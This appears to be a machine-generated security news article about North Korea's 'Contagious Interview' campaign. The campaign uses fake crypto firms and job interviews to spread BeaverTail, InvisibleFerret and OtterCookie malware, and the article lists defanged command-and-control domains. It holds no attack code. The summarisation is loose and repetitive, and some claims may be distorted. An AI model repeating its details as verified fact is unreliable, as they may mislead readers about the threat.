Ethical Hacking News
In a recent campaign, North Korean hackers have been using fake job postings and cryptocurrency firms to distribute malware. The Contagious Interview campaign involves the use of artificial intelligence-powered tools to optimize every step in the process of applying and interviewing for roles. This article provides an in-depth analysis of the campaign and its implications for cybersecurity professionals.
North Korea has been linked to a malicious campaign using AI-powered tools to steal sensitive data and spread malware. The campaign, called Contagious Interview, uses front companies in the cryptocurrency consulting industry to distribute malware via job interview lures. The threat actors set up three front companies, BlockNovas LLC, Angeloper Agency, and SoftGlide LLC, to spread malware. The malware families include BeaverTail, InvisibleFerret, and OtterCookie, which can harvest system information, launch reverse shells, and steal browser data. The threat actors use AI-powered tools like Remaker to create fake profile pictures for recruitment drives. The campaign has led to at least one developer getting their MetaMask wallet compromised in September 2024. The BlockNovas front company is allegedly using a seized domain, and the FBI is investigating North Korean cyber actors using it for malicious activities.
North Korea, a country notorious for its alleged involvement in various cybercrimes, has recently been linked to a malicious campaign designed to steal sensitive data and spread malware. The Contagious Interview campaign, as it is known, involves the use of artificial intelligence (AI)-powered tools to optimize every step in the process of applying and interviewing for roles, thereby facilitating the distribution of malware.
The campaign, which has been tracked by the broader cybersecurity community under various monikers such as CL-STA-0240, DeceptiveDevelopment, DEV#POPPER, Famous Chollima, UNC5342, and Void Dokkaebi, involves the use of front companies in the cryptocurrency consulting industry to spread malware via 'job interview lures.' The threat actors, who are believed to be operating from China, Russia, and Pakistan, have set up three front companies, namely BlockNovas LLC, Angeloper Agency, and SoftGlide LLC, to distribute malware.
The malware families being distributed by the threat actors include BeaverTail, InvisibleFerret, and OtterCookie. The BeaverTail malware is configured to contact an external server ("lianxinxiao[.]com") for command-and-control (C2) to serve InvisibleFerret as the follow-up payload. It comes with various features to harvest system information, launch a reverse shell, download additional modules to steal browser data, files, and initiate the installation of the AnyDesk remote access software.
The use of front companies for malware propagation complements the setup of fraudulent accounts on social media platforms such as Facebook, LinkedIn, Pinterest, X, Medium, GitHub, and GitLab. This marks a new escalation for the threat actors, who have been observed using various job boards to lure victims into downloading cross-platform malware under the pretext of coding assignment or fixing an issue with their browser when turning on camera during a video assessment.
The Contagious Interview campaign also involves the use of AI-powered tools such as Remaker to create profile pictures for the fake recruitment drives. The malicious activity has led to at least one developer getting their MetaMask wallet allegedly compromised in September 2024.
Furthermore, the threat actors have been observed hosting a tool named Kryptoneer on the domain attisscmo[.]com that offers the ability to connect to cryptocurrency wallets such as Suiet Wallet, Ethos Wallet, and Sui Wallet. The use of this domain has led some researchers to speculate that North Korean threat actors may be targeting the Sui blockchain or using it as an example of a 'crypto project' being worked on.
The BlockNovas front company has 14 people allegedly working for them, however many of the employee personas appear to be fake. When viewing the 'About Us' page of blocknovas[.]com via the Wayback Machine, the group claimed to have been operating for '12+ years' – which is 11 years longer than the business has been registered.
In December 2024, BlockNovas advertised an open position for a senior software engineer on LinkedIn, specifically targeting Ukrainian IT professionals. However, as of April 23, 2025, the BlockNovas domain has been seized by the U.S. Federal Bureau of Investigation (FBI) as part of a law enforcement action against North Korean cyber actors for using it to "deceive individuals with fake job postings and distribute malware."
The use of VPN services, proxy servers, and numerous VPS servers with RDP layers has led researchers to identify five Russian IP ranges that have been used to carry out the operation. These IP addresses are obscured by a large anonymization network that uses commercial VPN services, proxy servers, and numerous VPS servers with RDP.
The discovery of this campaign highlights the evolving tactics, techniques, and procedures (TTPs) being employed by North Korean threat actors to spread malware. The use of AI-powered tools and front companies marks a new level of sophistication in their malicious activities, making it essential for cybersecurity professionals to stay vigilant and adapt their strategies accordingly.
Related Information:
https://www.ethicalhackingnews.com/articles/North-Korean-Hackers-Spread-Malware-via-Fake-Crypto-Firms-and-Job-Interview-Lures-ehn.shtml
Published: Fri Apr 25 11:14:40 2025 by llama3.2 3B Q4_K_M
